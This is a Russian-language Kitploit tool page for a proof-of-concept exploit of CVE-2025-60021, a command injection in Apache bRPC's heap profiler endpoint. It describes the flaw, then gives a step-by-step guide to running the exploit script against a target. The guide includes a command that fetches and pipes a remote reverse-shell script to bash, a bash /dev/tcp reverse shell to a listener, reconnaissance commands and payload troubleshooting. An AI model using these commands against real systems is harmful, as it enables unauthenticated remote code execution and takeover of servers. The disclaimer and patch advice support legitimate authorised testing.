Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Ashwesker-CVE-2025-60021 — CVE-2025-60021 | Kitploit
Инструменты/GitHubGitHub/mefhika120/ashwesker-cve-2025-60021
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеRed TeamingРазработка Полезной Нагрузки
GitHubmefhika120/ashwesker-cve-2025-60021

Ashwesker-CVE-2025-60021

CVE-2025-60021

Репозиторий
288 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛑 CVE-2025-60021 — Удаленное выполнение команд в Apache bRPC

G_GmijOXQAAX5iE

📌 Обзор

CVE-2025-60021 — это критическая уязвимость удаленного внедрения команд, обнаруженная во встроенном профилировщике кучи (/pprof/heap) Apache bRPC версий ранее 1.15.0, позволяющая неаутентифицированным злоумышленникам выполнять произвольные команды ОС. ([NVD][1])


🔓 Детали уязвимости

АтрибутИнформация
Название / IDCVE-2025-60021
ПродуктApache bRPC (все платформы)
Затронутые версии< 1.15.0
Дата публикации16 января 2026 ([NVD][1])
Тип уязвимостиУдаленное внедрение команд (CWE-77) ([NVD][1])
Эндпоинт/pprof/heap
ТриггерНесанитизированный параметр extra_options
Коренная причинаВвод не проверяется перед выполнением в качестве команды ОС ([openwall.com][2])

❗Злоумышленники могут удаленно внедрять команды, просто манипулируя этим параметром профилирования.


🚨 Серьезность и риск

🔥 Уровень серьезности: Критический 📊 Базовая оценка CVSS v3.1: 9.8 / 10 Вектор: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H ([INCIBE][3])

Категория воздействияЭффект
КонфиденциальностьВысокий
ЦелостностьВысокий
ДоступностьВысокий
Вектор атакиСеть
ПривилегииНе требуются
Взаимодействие с пользователемНе требуется([INCIBE][3])

👉 Это означает, что злоумышленники могут выполнять произвольные команды удаленно без входа в систему — наихудший сценарий для открытых сервисов.


🧠 Технический разбор

🔍 Как это работает

  1. Доступность профилировщика кучи: bRPC предоставляет эндпоинт профилирования (/pprof/heap), предназначенный для анализа памяти (jemalloc). ([openwall.com][2])
  2. Ошибка обработки ввода: Эндпоинт принимает параметр extra_options. Вместо санитизации, bRPC передает его напрямую в командную оболочку ОС. ([openwall.com][2])
  3. Внедрение команд: Злоумышленник формирует ввод, содержащий системные команды → сервис их выполняет. ([CVE Details][4])

Пошаговое руководство по использованию PoC-скрипта CVE-2025-60021

Предполагается, что скрипт сохранён как CVE-2025-60021.py (хотя реальный CVE — 2025-60021 — можете переименовать). Это Python 3 скрипт для демонстрации уязвимости удаленного внедрения команд в профилировщике кучи Apache bRPC. Запускайте только на системах, которыми владеете, или при наличии явного письменного разрешения на тестирование — эксплуатация без авторизации незаконна.

Предварительные требования

  1. Среда Python: Убедитесь, что установлен Python 3 (например, 3.6+). Скрипт использует встроенные модули плюс requests и argparse (стандартные или легко устанавливаемые).

  2. Установка зависимостей: Если ещё не установлено, установите библиотеку requests:

    pip install requests
    
  3. Целевая настройка: Вам необходим уязвимый сервер Apache bRPC:

    • Версия < 1.15.0.
    • Включён профилировщик кучи (проверьте конфигурацию сервера; в dev-сборках часто включён по умолчанию).
    • Доступен по сети (например, http://localhost:8060 или удалённый IP/порт). При локальном тестировании настройте уязвимый экземпляр bRPC (например, через Docker или сборку из исходников — обратитесь к документации Apache bRPC).
  4. Права доступа: Запускайте с sudo только при необходимости сетевого доступа или привилегий; в остальных случаях подойдёт обычный python3.

Шаг 1: Сохраните скрипт

Скопируйте предоставленный код PoC в файл с именем CVE-2025-60021.py. При желании сделайте его исполняемым:

chmod +x CVE-2025-60021.py

Шаг 2: Поймите аргументы

Скрипт принимает два обязательных позиционных аргумента:

  • target: URL уязвимого сервера bRPC (например, http://192.168.1.100:8060 или http://targets:8060 — исправьте опечатки, например, отсутствие схемы или неверный хост).
  • cmd: Команда для выполнения на цели (например, "id" для информации о пользователе, или более сложная, например, "curl http://your-server/reverse-shell.sh | bash" для обратной оболочки). Используйте && или ; для объединения нескольких команд.

Шаг 3: Запустите скрипт

Откройте терминал (например, в Kali Linux, как вы используете) и выполните его с вашей целью и командой. Примеры команд:

  • Базовый тест (получить информацию о системе):

    sudo python3 CVE-2025-60021.py http://targets:8060 "id && whoami && uname -a"
    
  • Пример обратной оболочки (замените your-listener-ip и порт; предварительно запустите слушатель, например nc -lvnp 4444):

    sudo python3 CVE-2025-60021.py http://targets:8060 "bash -i >& /dev/tcp/your-listener-ip/4444 0>&1"
    
  • Если используется HTTPS или другой порт, измените URL соответственно (например, https://target:443 — скрипт обработает, но добавьте --insecure при проблемах с сертификатами).

Шаг 4: Интерпретация вывода

Индикаторы успеха:

  • Exploit likely succeeded! (200 OK)
  • Возможен вывод команды в теле ответа (например, uid=0(root)..., если выполнялась id).
  • Для команд без вывода (например, запись файлов или оболочки) проверьте целевой сервер (логи, процессы) или ваш слушатель.

Индикаторы неудачи (как вы видели):

  • Got status code 404 - maybe not vulnerable?"
  • Сообщения об ошибках, например "[E1002] Heap profiler is not enabled" означают, что эндпоинт неактивен — включите его на цели или найдите другой уязвимый экземпляр.
  • Тайм-ауты или ошибки соединения: цель недоступна, блокируется брандмауэром или неверный порт.
  • Если вывод не утекает, команда всё равно выполняется молча на сервере.

Шаг 5: Устранение типичных проблем

  • Ошибка 404: Профилировщик кучи отключён. Включите его в конфигурации bRPC (например, --enable_heap_profiler=true) и перезапустите сервер.
  • Ошибка Argparse: Забыли аргумент cmd — всегда указывайте его.
  • Отсутствие вывода в теле ответа: Некоторые команды не генерируют stdout. Используйте те, которые генерируют (например, echo "test" > /tmp/proof.txt) и проверьте файл на цели.
  • Привилегии: Если процесс bRPC запущен не от root, команды ограничены правами этого пользователя.
  • Изменение полезной нагрузки: Если ; не работает, попробуйте && или | для объединения. URL-кодирование спецсимволов, если необходимо (скрипт обрабатывает большую часть).
  • Локальное тестирование: Запустите уязвимый Docker-контейнер для bRPC, чтобы проверить без риска для реальных систем.

Шаг 6: Очистка и этические замечания

  • После тестирования устраните уязвимость на цели: обновите bRPC до версии 1.15.0+ или отключите /pprof/heap.
  • Удалите любые артефакты (например, оболочки или созданные файлы).
  • Задокументируйте тесты для соответствия требованиям, если проводите пентест.
Скачать инструмент